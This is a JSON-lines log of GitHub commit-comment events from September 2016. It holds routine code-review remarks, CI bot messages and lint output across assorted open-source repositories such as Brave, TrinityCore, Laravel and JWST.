{"id":"4550440231","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18987717,"position":null,"line":null,"path":null,"commit_id":"12e7ffbd8e107fcfb86c36e91ed4d1ed854855f3","created_at":"2016-09-12T16:40:47Z","updated_at":"2016-09-12T16:40:47Z","body":"> app/extensions/dashlane/content/scripts/bundle.js\r\n\r\nThis is not going to last in 0.12.2, needs a better fix pls. It'll be downloaded from Chrome.  Are there any other patching you've done like this?"}},"created_at":"2016-09-12T16:40:47Z"}
{"id":"4550441585","type":"CommitCommentEvent","actor":{"login":"pweibring"},"repo":{"name":"pweibring/test-lv"},"payload":{"comment":{"id":18987721,"position":null,"line":null,"path":null,"commit_id":"37fc9ade3f662a7fc1df937dec9c56af62d40160","created_at":"2016-09-12T16:41:02Z","updated_at":"2016-09-12T16:41:02Z","body":"ok"}},"created_at":"2016-09-12T16:41:02Z"}
{"id":"4550444363","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18987728,"position":null,"line":null,"path":null,"commit_id":"780dfe229c267c188e089d49f5cf5959933dcd1a","created_at":"2016-09-12T16:41:35Z","updated_at":"2016-09-12T16:41:35Z","body":"TaskCluster: @meetmangukiya does not have permission to trigger tasks."}},"created_at":"2016-09-12T16:41:35Z"}
{"id":"4550444996","type":"CommitCommentEvent","actor":{"login":"Mcote93"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18987730,"position":null,"line":null,"path":null,"commit_id":"42f2b3525cc2ce810d17b9c258370ec5933838b6","created_at":"2016-09-12T16:41:41Z","updated_at":"2016-09-12T16:41:41Z","body":"Hello this update is for 7.0.3 build 22566 or not ? Beacause y want to complie a core on ubuntu and y dont see a branch of 7.0.3 for the last build 22566 thanks :) if you want give me a link of the source pleaze "}},"created_at":"2016-09-12T16:41:41Z"}
{"id":"4550446363","type":"CommitCommentEvent","actor":{"login":"KasperFranz"},"repo":{"name":"CommunityBuilt/AutoMessage"},"payload":{"comment":{"id":18987731,"position":null,"line":null,"path":null,"commit_id":"9efb276ea5450aeafc93b8ecb82390b98b1fe60d","created_at":"2016-09-12T16:41:56Z","updated_at":"2016-09-12T16:41:56Z","body":"This is 1.10.2 my mistake :p"}},"created_at":"2016-09-12T16:41:56Z"}
{"id":"4550447869","type":"CommitCommentEvent","actor":{"login":"vinshanks"},"repo":{"name":"vinshanks/myfirstRepository"},"payload":{"comment":{"id":18987738,"position":2,"line":null,"path":"README.md","commit_id":"8e9ed69bc0f2215d6af1de9b67dfbd57213f01d7","created_at":"2016-09-12T16:42:14Z","updated_at":"2016-09-12T16:42:14Z","body":"i wanna see"}},"created_at":"2016-09-12T16:42:14Z"}
{"id":"4550448644","type":"CommitCommentEvent","actor":{"login":"grixa"},"repo":{"name":"KnowSheet/CTFO_BE"},"payload":{"comment":{"id":18987740,"position":8,"line":261,"path":"crunchers/test.cc","commit_id":"b6c3f8eaaf855b72730745947cb1710ca48e1fe9","created_at":"2016-09-12T16:42:22Z","updated_at":"2016-09-12T16:42:22Z","body":":-) There is no special meaning in this formula. The only reason of these coefficients is to force the result ratings to rearrange themselves after each block of \"golden\" data.. Perhaps, reversing this formula and the data could make the test look slightly less strange =)."}},"created_at":"2016-09-12T16:42:22Z"}
{"id":"4550449199","type":"CommitCommentEvent","actor":{"login":"stuwph"},"repo":{"name":"syzygy1/Cfish"},"payload":{"comment":{"id":18987742,"position":null,"line":null,"path":null,"commit_id":"8cc1010bb510e39b5469b72304ff3cff879bde5b","created_at":"2016-09-12T16:42:28Z","updated_at":"2016-09-12T16:42:28Z","body":"your Cfish plays very strong! stronger than actual Stockfish in my local tests\r\n\r\nas another enhancement I tried to add Cerebellum book from Brainfish but my skills failed doing that\r\nhave to say that I'm not a programmer but a compiler  mangling with the code\r\n\r\nmaybe you are interested to have look on it?\r\n\r\nI created a \"cerebellum\" branch in \r\nhttps://github.com/stuwph/Cfish\r\nwith a patch that works in Stockfish, but has to be adopted to C\r\n\r\nand a note about LargePages in Windows: Fritz15 gui confirms only up to 1023MB "}},"created_at":"2016-09-12T16:42:28Z"}
{"id":"4550450203","type":"CommitCommentEvent","actor":{"login":"luveti"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18987745,"position":null,"line":null,"path":null,"commit_id":"0bef3e4433f697d0468a378e716e9c4c0bd286af","created_at":"2016-09-12T16:42:40Z","updated_at":"2016-09-12T16:42:40Z","body":";)"}},"created_at":"2016-09-12T16:42:40Z"}
{"id":"4550452123","type":"CommitCommentEvent","actor":{"login":"DDuarte"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18987747,"position":null,"line":null,"path":null,"commit_id":"42f2b3525cc2ce810d17b9c258370ec5933838b6","created_at":"2016-09-12T16:42:59Z","updated_at":"2016-09-12T16:42:59Z","body":"6.x branch supports 7.0.3.22566"}},"created_at":"2016-09-12T16:42:59Z"}
{"id":"4550452849","type":"CommitCommentEvent","actor":{"login":"luveti"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18987749,"position":null,"line":null,"path":null,"commit_id":"3aadb488cebf289358f2399d9fc8aa0f66cd0583","created_at":"2016-09-12T16:43:06Z","updated_at":"2016-09-12T16:43:06Z","body":"👍 "}},"created_at":"2016-09-12T16:43:06Z"}
{"id":"4550454165","type":"CommitCommentEvent","actor":{"login":"rurban"},"repo":{"name":"CpanelInc/perl-compiler"},"payload":{"comment":{"id":18987750,"position":13,"line":339,"path":"lib/B/C/Templates/base.c.tt2","commit_id":"16265d6fd3d7e85eba1bdcb0dcb3f3e37eb8cad8","created_at":"2016-09-12T16:43:21Z","updated_at":"2016-09-12T16:43:21Z","body":"Are those loops actually faster?\r\nNormally the compiler unrolls those loops into statements as before. \r\nHere they are just put together, which would help I guess. In the old compiler they are spread out. \r\nBut it's just inc of one int flag of the struct already in the cache, so the loop has much higher overhead.\r\n"}},"created_at":"2016-09-12T16:43:21Z"}
{"id":"4550454489","type":"CommitCommentEvent","actor":{"login":"hbushouse"},"repo":{"name":"STScI-JWST/jwst"},"payload":{"comment":{"id":18987751,"position":5,"line":329,"path":"jwst/assign_wcs/nirspec.py","commit_id":"7588668b44b77486cdafb35f7e2eb2dcfa7d1b63","created_at":"2016-09-12T16:43:24Z","updated_at":"2016-09-12T16:43:24Z","body":"Yes, they should be included. They will need to be extracted (in extract_2d) just like all the other slitlets. The data in them will be used for background subtraction of target slitlets. I don't know if they currently show up in the source_info table, with a name something like \"Background 1\", etc., but they should. Because they don't have an individual shutter identified as the \"main\" shutter, I guess you'd just have to use the geometric center of the slitlet to define the xy_centers."}},"created_at":"2016-09-12T16:43:24Z"}
{"id":"4550458142","type":"CommitCommentEvent","actor":{"login":"Mcote93"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18987761,"position":null,"line":null,"path":null,"commit_id":"42f2b3525cc2ce810d17b9c258370ec5933838b6","created_at":"2016-09-12T16:44:05Z","updated_at":"2016-09-12T16:44:05Z","body":"Hoo yeah thank :)"}},"created_at":"2016-09-12T16:44:05Z"}
{"id":"4550459312","type":"CommitCommentEvent","actor":{"login":"KirillMysnik"},"repo":{"name":"GunGame-Dev-Team/GunGame-SP"},"payload":{"comment":{"id":18987765,"position":null,"line":null,"path":null,"commit_id":"1ee934ed3afbbc045d0d8b74191f4fdda154c16b","created_at":"2016-09-12T16:44:18Z","updated_at":"2016-09-12T16:44:18Z","body":"What's the reasoning behind this? I know it's probably documented somewhere in PEP, but SP plugins are a rather special case as you have to hardcore plugin name in your imports."}},"created_at":"2016-09-12T16:44:18Z"}
{"id":"4550459360","type":"CommitCommentEvent","actor":{"login":"mossprescott"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18987766,"position":15,"line":85,"path":"mongodb/src/main/scala/quasar/physical/mongodb/workflow/package.scala","commit_id":"ac09b920419b658ca38ac66cf8621413740a7e2b","created_at":"2016-09-12T16:44:18Z","updated_at":"2016-09-12T16:44:18Z","body":"@paulp, @sellout: this is the import that causes trouble. I can import from this value in a companion object, but I get an error with a similar message if try to do the same thing in a package object or class. It wasn't so painful here, but tests use these constructors very heavily and of course I get the error if try to use this import there.\r\n\r\nI've tried to minimize the compile error with some simple types without any luck. Comment coming up on the declaration…"}},"created_at":"2016-09-12T16:44:18Z"}
{"id":"4550461785","type":"CommitCommentEvent","actor":{"login":"jobachh"},"repo":{"name":"CCI-MIT/XCoLab"},"payload":{"comment":{"id":18987771,"position":5,"line":20,"path":"microservices/clients/sharedcolab-client/src/main/java/org/xcolab/client/sharedcolab/SharedColabClient.java","commit_id":"5219a8605ae14dcc05a1300e75560f9090b7e95c","created_at":"2016-09-12T16:44:44Z","updated_at":"2016-09-12T16:44:44Z","body":"I ended up doing this myself while I was working on the sharedcolab-service. There's now a `RefreshingRestService` class that automatically loads the hostname and port from configuration attributes that are passed in. This way we only configure it once when we define the service, rather than each time we use it."}},"created_at":"2016-09-12T16:44:44Z"}
{"id":"4550471185","type":"CommitCommentEvent","actor":{"login":"abc123994"},"repo":{"name":"abc123994/colour"},"payload":{"comment":{"id":18987789,"position":null,"line":null,"path":null,"commit_id":"dc72851c265c0756371bcbd8642942eb513e27b1","created_at":"2016-09-12T16:46:29Z","updated_at":"2016-09-12T16:46:29Z","body":"這邊紀錄的評價是,答錯單題的評價\r\n未來會加以修正"}},"created_at":"2016-09-12T16:46:29Z"}
{"id":"4550472152","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18987793,"position":null,"line":null,"path":null,"commit_id":"40c981b1e8f845ec719110bca03efaa2184c9bca","created_at":"2016-09-12T16:46:40Z","updated_at":"2016-09-12T16:46:40Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=32)"}},"created_at":"2016-09-12T16:46:40Z"}
{"id":"4550472165","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18987794,"position":null,"line":null,"path":null,"commit_id":"5a778498e122b03c933ef476203d4537d8544dc2","created_at":"2016-09-12T16:46:41Z","updated_at":"2016-09-12T16:46:41Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=32)"}},"created_at":"2016-09-12T16:46:41Z"}
{"id":"4550472179","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18987795,"position":null,"line":null,"path":null,"commit_id":"2f9432db071d8e225259db9e1077d45e13399dcf","created_at":"2016-09-12T16:46:41Z","updated_at":"2016-09-12T16:46:41Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=32)"}},"created_at":"2016-09-12T16:46:41Z"}
{"id":"4550472194","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18987796,"position":null,"line":null,"path":null,"commit_id":"5089f234d1ffa56249220f3d9f1b8171843314c9","created_at":"2016-09-12T16:46:41Z","updated_at":"2016-09-12T16:46:41Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=32)"}},"created_at":"2016-09-12T16:46:41Z"}
{"id":"4550472965","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18987797,"position":null,"line":null,"path":null,"commit_id":"c4fffbeb339056a618ff8c5ba1f236f1cd322417","created_at":"2016-09-12T16:46:50Z","updated_at":"2016-09-12T16:46:50Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=35)"}},"created_at":"2016-09-12T16:46:50Z"}
{"id":"4550472985","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18987798,"position":null,"line":null,"path":null,"commit_id":"2be8200278a686e769d2cb4630567f0aec5d40c9","created_at":"2016-09-12T16:46:50Z","updated_at":"2016-09-12T16:46:50Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=35)"}},"created_at":"2016-09-12T16:46:50Z"}
{"id":"4550474238","type":"CommitCommentEvent","actor":{"login":"lyallg"},"repo":{"name":"lyallg/lyallg-test"},"payload":{"comment":{"id":18987803,"position":2,"line":2,"path":"README.md","commit_id":"6e8e2ae68d0bffdd206db3fe33bce57d7de8ab01","created_at":"2016-09-12T16:47:05Z","updated_at":"2016-09-12T16:47:05Z","body":"This is only a test."}},"created_at":"2016-09-12T16:47:05Z"}
{"id":"4550476363","type":"CommitCommentEvent","actor":{"login":"themightychris"},"repo":{"name":"SlateFoundation/slate-cbl"},"payload":{"comment":{"id":18987811,"position":null,"line":null,"path":null,"commit_id":"5c2dc1e33084ea890ad89f236491d1c4f0c6518d","created_at":"2016-09-12T16:47:29Z","updated_at":"2016-09-12T16:47:29Z","body":"@nbey I don't understand why this is necessary, the reported issue was in loading from the DemonstrationSkills endpoint"}},"created_at":"2016-09-12T16:47:29Z"}
{"id":"4550480481","type":"CommitCommentEvent","actor":{"login":"deroneriksson"},"repo":{"name":"apache/incubator-systemml"},"payload":{"comment":{"id":18987821,"position":null,"line":null,"path":null,"commit_id":"b3d1932419e32d2f89c1a516044a8da651012ff7","created_at":"2016-09-12T16:48:14Z","updated_at":"2016-09-12T16:48:14Z","body":"@mboehm7 OK I will have a look.\r\n"}},"created_at":"2016-09-12T16:48:14Z"}
{"id":"4550481031","type":"CommitCommentEvent","actor":{"login":"tlimpanont"},"repo":{"name":"part-up/part-up"},"payload":{"comment":{"id":18987822,"position":7,"line":7,"path":"app/tests/cucumber/features/helpers/cookiebar.js","commit_id":"4b1075a0d224b74757e5777fb3efabe1a6781530","created_at":"2016-09-12T16:48:20Z","updated_at":"2016-09-12T16:48:20Z","body":"please remove console.log when you're finished your work"}},"created_at":"2016-09-12T16:48:20Z"}
{"id":"4550484273","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18987840,"position":null,"line":null,"path":null,"commit_id":"178cb6f5401c9cdcd82f24a3e95c892a14bfacb3","created_at":"2016-09-12T16:48:55Z","updated_at":"2016-09-12T16:48:55Z","body":"yep we could also keep the view override in templates. But then, the order become : \r\n\r\n1. Plugin \r\n    should be possible to set: \"use plugin view even if custom question object? Yes/No\"\r\n    where custom means there is inherited question object or overridden views in template \r\n\r\n2. Template views\r\n     Should be possible to set in template config: \"use template views even if user installed extended Question Types?\"\r\n     where extended question type mean user use an extended question type (ex: a gender question with   custom HTML  used as default gender question type)\r\n\r\n3. Question object views (core, or extended), with an option for extended: \"ON/OFF\"\r\n\r\nThen, it's up to the user to check if its plugins/templates/views are compatible. \r\n\r\nScenario examples:\r\n\r\n1. User installed a plugin to overwrite the HTML of gender to use foundation. He installed a template using foundation. He's using core Question Object using bootstrap. \r\nHe can set HTML plugin to be loaded, or template view override to be loaded. \r\n\r\n2. User installed a plugin to overwrite the HTML of gender to use foundation, a template using bootstrap, a question object extending gender using  a foundation\r\nHe should turn off the question object extension and the plugin. \r\n\r\netc etc\r\n\r\nBut this is for later. Current work of Denis, Tammo and Peter should not be impacted by all those speculations on the future.\r\n "}},"created_at":"2016-09-12T16:48:55Z"}
{"id":"4550484812","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":18987844,"position":null,"line":null,"path":null,"commit_id":"dbe72926920814881c4bbd9762bc0cc04aab10cc","created_at":"2016-09-12T16:49:01Z","updated_at":"2016-09-12T16:49:01Z","body":"Yes, I think we need to revert this"}},"created_at":"2016-09-12T16:49:01Z"}
{"id":"4550489687","type":"CommitCommentEvent","actor":{"login":"kamranahmedse"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18987866,"position":64,"line":64,"path":"src/Illuminate/Support/Testing/Fakes/BusFake.php","commit_id":"5deab59e89b85e09b2bd1642e4efe55e933805ca","created_at":"2016-09-12T16:49:56Z","updated_at":"2016-09-12T16:49:56Z","body":"Indeed. If it is ever `null`, it will be assigned the default closure at line#60."}},"created_at":"2016-09-12T16:49:56Z"}
{"id":"4550490794","type":"CommitCommentEvent","actor":{"login":"HashBang173"},"repo":{"name":"gmillz/device_motorola_clark"},"payload":{"comment":{"id":18987869,"position":12,"line":598,"path":"proprietary-files.txt","commit_id":"6b10e70220f8690ab657125c444846ad788dcdad","created_at":"2016-09-12T16:50:12Z","updated_at":"2016-09-12T16:50:12Z","body":"Using the source built libril.so on M does not allow the device to enter deep sleep"}},"created_at":"2016-09-12T16:50:12Z"}
{"id":"4550496638","type":"CommitCommentEvent","actor":{"login":"tlimpanont"},"repo":{"name":"part-up/part-up"},"payload":{"comment":{"id":18987880,"position":58,"line":58,"path":"app/tests/cucumber/features/step_definitions/tribe-chat_step.js","commit_id":"4b1075a0d224b74757e5777fb3efabe1a6781530","created_at":"2016-09-12T16:51:16Z","updated_at":"2016-09-12T16:51:16Z","body":"how come that the index of an array is an negative value. i would expect [0,1,2] etc."}},"created_at":"2016-09-12T16:51:16Z"}
{"id":"4550499726","type":"CommitCommentEvent","actor":{"login":"nbey"},"repo":{"name":"SlateFoundation/slate-cbl"},"payload":{"comment":{"id":18987885,"position":null,"line":null,"path":null,"commit_id":"5c2dc1e33084ea890ad89f236491d1c4f0c6518d","created_at":"2016-09-12T16:51:49Z","updated_at":"2016-09-12T16:51:49Z","body":"@themightychris Without that variable, it appeared to be adding the `$browseOrder` to RecordsRequestHandler, or something along those lines.\r\nI'm fairly certain the issue was introduced when I moved the `$browseOrder` out of a config file, and into the `SkillsRequestHandler` class."}},"created_at":"2016-09-12T16:51:49Z"}
{"id":"4550507178","type":"CommitCommentEvent","actor":{"login":"charlesmilette"},"repo":{"name":"charlesmilette/SearchWithMyBrowser"},"payload":{"comment":{"id":18987901,"position":5,"line":5,"path":"CustomSearchEngine.md","commit_id":"6bfac105be0f9b6f33e51fb19b9e5f4bdf0deaf3","created_at":"2016-09-12T16:53:14Z","updated_at":"2016-09-12T16:53:14Z","body":"You're right.\r\n\r\nThat flag doesn't exists anymore. I'll remove that line."}},"created_at":"2016-09-12T16:53:14Z"}
{"id":"4550507448","type":"CommitCommentEvent","actor":{"login":"brechmos-stsci"},"repo":{"name":"STScI-JWST/jwst"},"payload":{"comment":{"id":18987905,"position":5,"line":329,"path":"jwst/assign_wcs/nirspec.py","commit_id":"7588668b44b77486cdafb35f7e2eb2dcfa7d1b63","created_at":"2016-09-12T16:53:17Z","updated_at":"2016-09-12T16:53:17Z","body":"Yes, they are currently excluded from the processing. I'll have to recode slightly... \r\n\r\nAnd so to confirm... \r\n\r\nIf there is at least one \"main shutter\" (ie non background) then use the first as the x/y center.  If there are no \"main shutters\" (ie all background) then take the average of the rows and average of the columns. "}},"created_at":"2016-09-12T16:53:17Z"}
{"id":"4550508745","type":"CommitCommentEvent","actor":{"login":"VitorNorris"},"repo":{"name":"VitorNorris/hello-word"},"payload":{"comment":{"id":18987907,"position":null,"line":null,"path":null,"commit_id":"21b8792daf4ac799f45e11bc5520aba240bea152","created_at":"2016-09-12T16:53:30Z","updated_at":"2016-09-12T16:53:30Z","body":"segunda alteração"}},"created_at":"2016-09-12T16:53:30Z"}
{"id":"4550508785","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18987908,"position":null,"line":null,"path":null,"commit_id":"5ec92564b06f1714cc9de355b6c174cc6e1fda54","created_at":"2016-09-12T16:53:30Z","updated_at":"2016-09-12T16:53:30Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ec92564b06f1714cc9de355b6c174cc6e1fda54-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-12T16:53:30Z"}
{"id":"4550509233","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18987910,"position":null,"line":null,"path":null,"commit_id":"2f6cc57de94fba0b3db0abd095f26095f969ec70","created_at":"2016-09-12T16:53:35Z","updated_at":"2016-09-12T16:53:35Z","body":"TaskCluster: @meetmangukiya does not have permission to trigger tasks."}},"created_at":"2016-09-12T16:53:35Z"}
{"id":"4550509573","type":"CommitCommentEvent","actor":{"login":"mairatma"},"repo":{"name":"metal/metal.js"},"payload":{"comment":{"id":18987912,"position":null,"line":null,"path":null,"commit_id":"dad80412eeba242b70380fdc726708b45b8e1748","created_at":"2016-09-12T16:53:39Z","updated_at":"2016-09-12T16:53:39Z","body":"None, we just don't have to manually set loose mode for IE <= 10 to work anymore, babel has fixed this by default. Our preset was just making sure all browsers worked, but now we can use the original babel-preset-es2015 instead since that will already be ok for everything."}},"created_at":"2016-09-12T16:53:39Z"}
{"id":"4550510814","type":"CommitCommentEvent","actor":{"login":"zamoose"},"repo":{"name":"trepmal/wp-hud"},"payload":{"comment":{"id":18987915,"position":null,"line":null,"path":null,"commit_id":"333cd980f8efa19a7a3298da9e6745a4cc262567","created_at":"2016-09-12T16:53:53Z","updated_at":"2016-09-12T16:53:53Z","body":"This all seems to use `WP_CLI::line`, though the docs [suggest](http://wp-cli.org/docs/internal-api/wp-cli-line/) using `WP_CLI::log` instead..."}},"created_at":"2016-09-12T16:53:53Z"}
{"id":"4550512473","type":"CommitCommentEvent","actor":{"login":"mairatma"},"repo":{"name":"metal/metal.js"},"payload":{"comment":{"id":18987921,"position":null,"line":null,"path":null,"commit_id":"dad80412eeba242b70380fdc726708b45b8e1748","created_at":"2016-09-12T16:54:13Z","updated_at":"2016-09-12T16:54:13Z","body":"You can keep using the preset if you like though, it still works, its the same as using babel-preset-es2015."}},"created_at":"2016-09-12T16:54:13Z"}
{"id":"4550512775","type":"CommitCommentEvent","actor":{"login":"kamranahmedse"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18987924,"position":81,"line":81,"path":"src/Illuminate/Support/Testing/Fakes/BusFake.php","commit_id":"5deab59e89b85e09b2bd1642e4efe55e933805ca","created_at":"2016-09-12T16:54:16Z","updated_at":"2016-09-12T16:54:16Z","body":"`return !empty($this->commands[$command]);` would suffice as `empty` does check for the existence as well. http://php.net/manual/en/function.empty.php"}},"created_at":"2016-09-12T16:54:16Z"}
{"id":"4550515178","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":18987935,"position":null,"line":null,"path":null,"commit_id":"aac59910028ffbd3688c5880d87da9145c3a230a","created_at":"2016-09-12T16:54:45Z","updated_at":"2016-09-12T16:54:45Z","body":"[R/parse-rtf.R:164:47:](https://github.com/jackwasey/icd/blob/aac59910028ffbd3688c5880d87da9145c3a230a/R/parse-rtf.R#L164) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  for (categ in fourth_digit_zero_categories) { #\"657\" \"672\"\n                                              ^\n```\n[R/parse-rtf.R:244:15:](https://github.com/jackwasey/icd/blob/aac59910028ffbd3688c5880d87da9145c3a230a/R/parse-rtf.R#L244) *style:* **Use <-, not =, for assignment.**\n```r\n​  icd9_majors = icd9_majors[!duplicated(icd9_majors)]\n              ^\n```\n[R/parse-rtf.R:259:23:](https://github.com/jackwasey/icd/blob/aac59910028ffbd3688c5880d87da9145c3a230a/R/parse-rtf.R#L259) *style:* **Commas should always have a space after.**\n```r\n​         value = TRUE,...)\n                      ^\n```\n[R/parse-rtf.R:381:5:](https://github.com/jackwasey/icd/blob/aac59910028ffbd3688c5880d87da9145c3a230a/R/parse-rtf.R#L381) *style:* **Commented code should be removed.**\n```r\n​  # re_fifth_range_V30V39 <- \"The following two fifths-digits are for use with the fourth-digit \\\\.0\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-12T16:54:45Z"}
{"id":"4550516017","type":"CommitCommentEvent","actor":{"login":"mossprescott"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18987937,"position":10,"line":328,"path":"mongodb/src/main/scala/quasar/physical/mongodb/expression/ExprOpCore.scala","commit_id":"ebcf3c2f61e4308b40c9182cd7f1924996114c7a","created_at":"2016-09-12T16:54:54Z","updated_at":"2016-09-12T16:54:54Z","body":"@paulp, @sellout: the idea here is to keep both the (co)recursive type `T` and the coproduct type `EX` free. At the moment, we essentially always use `Fix`, but we'll need to use the appropriate coproduct type depending on which version of MongoDB we're generating plans for.\r\n\r\nCapturing the types in this case class means that callers don't have to provide both types every time they want to say, e.g. `$var(v)`, and makes a huge difference in readability. But if the contents of this value can't be imported, then you end up having to prefix each use. So we're picking between `$var[Fix, ExprOpCoreF](v)` and `exprCoreFp.$var(v)`. Both are pretty bad.\r\n\r\nNote: I'm flirting with name collisions here because the package also contains objects with these same names (defined in an earlier commit lower down in this file), but those aren't used as much so I'd be willing to move or even eliminate them. Anyway as far as I can tell, that isn't causing the problem.\r\n\r\nI _think_ I can solve this problem another way by providing these wrappers only for `Fix` specifically. That leaves only the coproduct type for the compiler to infer and it seems to do a better job with that. At least, that's the approach taken in the similar wrappers seen in WorkflowOpCore et al."}},"created_at":"2016-09-12T16:54:54Z"}
{"id":"4550516884","type":"CommitCommentEvent","actor":{"login":"VitorNorris"},"repo":{"name":"VitorNorris/hello-word"},"payload":{"comment":{"id":18987945,"position":null,"line":null,"path":null,"commit_id":"21b8792daf4ac799f45e11bc5520aba240bea152","created_at":"2016-09-12T16:55:05Z","updated_at":"2016-09-12T16:55:05Z","body":"terceira alteração"}},"created_at":"2016-09-12T16:55:05Z"}
{"id":"4550519495","type":"CommitCommentEvent","actor":{"login":"ateucher"},"repo":{"name":"ateucher/rmapshaper"},"payload":{"comment":{"id":18987965,"position":null,"line":null,"path":null,"commit_id":"e7e0b4f3d8e67edda6bce59294c2e66ed971e90c","created_at":"2016-09-12T16:55:35Z","updated_at":"2016-09-12T16:55:35Z","body":"Pleasure! Your insights in #2 were absolutely invaluable."}},"created_at":"2016-09-12T16:55:35Z"}
{"id":"4550520482","type":"CommitCommentEvent","actor":{"login":"pawelkaczor"},"repo":{"name":"strongtyped/fun-cqrs"},"payload":{"comment":{"id":18987970,"position":33,"line":67,"path":"modules/core/src/main/scala/io/funcqrs/interpreters/Interpreter.scala","commit_id":"7dcc60f85b61a9e0cdf2ae709e7bf1105f938dca","created_at":"2016-09-12T16:55:46Z","updated_at":"2016-09-12T16:55:46Z","body":"`tryHandleAllEvents` is not used any longer so it can be removed"}},"created_at":"2016-09-12T16:55:46Z"}
{"id":"4550522444","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18987975,"position":null,"line":null,"path":null,"commit_id":"12e7ffbd8e107fcfb86c36e91ed4d1ed854855f3","created_at":"2016-09-12T16:56:08Z","updated_at":"2016-09-12T16:56:08Z","body":"yea, the nodeProps changed when I changed the way the popup window size works and somehow this got leftover\r\n\r\nI think the problem will go away when we put the unpacked extensions in the user data dir. We'll have to test and see if we still need this patch or not and this is the only one."}},"created_at":"2016-09-12T16:56:08Z"}
{"id":"4550526077","type":"CommitCommentEvent","actor":{"login":"Vdauphin"},"repo":{"name":"Vdauphin/HeartsAndMinds"},"payload":{"comment":{"id":18987979,"position":null,"line":null,"path":null,"commit_id":"c08ac07d56f5f4b7c21d15aeb2f6f07cb5bb876c","created_at":"2016-09-12T16:56:46Z","updated_at":"2016-09-12T16:56:46Z","body":"I will investigate :) \r\nDo not hesitate to create an issue, and add link to code or anything. \r\n:) It is better :)"}},"created_at":"2016-09-12T16:56:46Z"}
{"id":"4550530457","type":"CommitCommentEvent","actor":{"login":"tlimpanont"},"repo":{"name":"part-up/part-up"},"payload":{"comment":{"id":18987988,"position":6,"line":7,"path":"app/tests/cucumber/features/helpers/locators.js","commit_id":"4b1075a0d224b74757e5777fb3efabe1a6781530","created_at":"2016-09-12T16:57:33Z","updated_at":"2016-09-12T16:57:33Z","body":"the next line is the same functionality"}},"created_at":"2016-09-12T16:57:33Z"}
{"id":"4550530547","type":"CommitCommentEvent","actor":{"login":"TheAxeMan301"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18987989,"position":2,"line":2,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T16:57:34Z","updated_at":"2016-09-12T16:57:34Z","body":"Good idea. Or maybe listBunsenModel since it is for the item view in the list? Then expandedListBunsenModel for the expanded version."}},"created_at":"2016-09-12T16:57:34Z"}
